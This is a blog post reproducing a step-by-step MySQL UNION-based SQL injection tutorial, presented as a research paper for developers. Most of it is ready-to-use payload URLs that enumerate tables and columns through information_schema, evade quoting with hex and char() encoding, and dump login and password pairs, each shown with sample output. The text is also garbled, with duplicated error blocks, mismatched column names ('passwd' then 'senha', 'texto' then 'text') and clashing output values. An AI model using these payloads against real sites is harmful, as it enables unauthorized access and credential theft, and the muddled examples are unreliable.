We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique)
Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:-
Discover The Infamous MySQL Injection Technique
ABSTRACT:
Understand the technique MySQL Injection:
Searching Column (s) of a given table
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
Understand the technique MySQL Injection:
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application.
STEP BY STEP
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing
Dump: This happens in versions up 5.x.y [ 1º
Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name)
from information_schema.tables
where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1
<>------------------------<>-------------------------<>--------------------------<>
[ 2º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1
<>------------------------<>-------------------------<>--------------------------<>
[ 2º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1
=--------------------------=
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name)
from information_schema.tables
limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1
=--------------------------=
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name)
from information_schema.tables
limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1
=--------------------------=
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name)
from information_schema.tables
limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Searching Column (s) of a given table
* Brute
Force / Shooting
This
happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown
column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
=--------------------------=
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown
column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
=--------------------------=
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1
=--------------------------=
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1
=--------------------------=--------------------------=--------------------------=--------------------------=
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1
=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This
happens in versions up 5.x.y [ 1º Method ]
"usuarios" hexadecimal -> "7573756172696f73"
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
"usuarios" hexadecimal -> "7573756172696f73"
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1
<>------------------------<>-------------------------<>--------------------------<>
[ 2º Method ]
"usuarios" decimal -> "117,115,117,97,114,105,111,115"
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1
<>------------------------<>-------------------------<>--------------------------<>
[ 2º Method ]
"usuarios" decimal -> "117,115,117,97,114,105,111,115"
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
=--------------------------=
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name)
from information_schema.columns
where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1
=--------------------------=
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name)
from information_schema.columns
where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1
=--------------------------=
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name)
from information_schema.columns
where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting
data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from
usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1
=--------------------------=
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from
usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers :
mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1
=--------------------------=
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1
=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from
usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1
=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws()
=> unite
Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +
Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +
Readers,
this article is for educational purposes only, could continue explaining how to
exploit web sites, but that is not my intention.
It is
known that the impact of the change may provide unauthorized access to a
restricted area, being imperceptible to the eye of an inexperienced developer,
it may also allow the deletion of a table, compromising the entire application,
among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.
CONCLUSION
Many
companies are providing important information on its website and database,
information is the most valuable asset is intangible, the question is how
developers are dealing with this huge responsibility?
The
challenge is to develop increasingly innovative sites, coupled with mechanisms
that will provide security to users.
The
purpose of this paper is to present what is SQL Injection, how applications are
explored and techniques for testing by allowing the developer to customize a
system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution.
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH.
LINK TO OUR HOME PAGE :
Voice Of GREYHAT is a non-profit Organization propagating news specifically related with Cyber security threats, Hacking threads and issues from all over the spectrum. The news provided by us on this site is gathered from various Re-Sources. if any person have some FAQ's in their mind they can Contact Us. Also you can read our Privacy Policy for more info.
Thank You !
-Team VOGH
If you enjoyed VOGH News, Articles Then Do Make sure you to Subscribe Our RSS feed. Stay Tuned with VOGH and get Updated about Cyber Security News, Hacking Threads and Lots More. All our Articles and Updates will directly be sent to Your Inbox. Thank You!
-Team VOGH
Categories:
greyhat
,
MySql
,
Rafael Souza
,
ROT
,
sql-i
,
vogh exclusive
,
vulnerability assessment
,
vulnerablity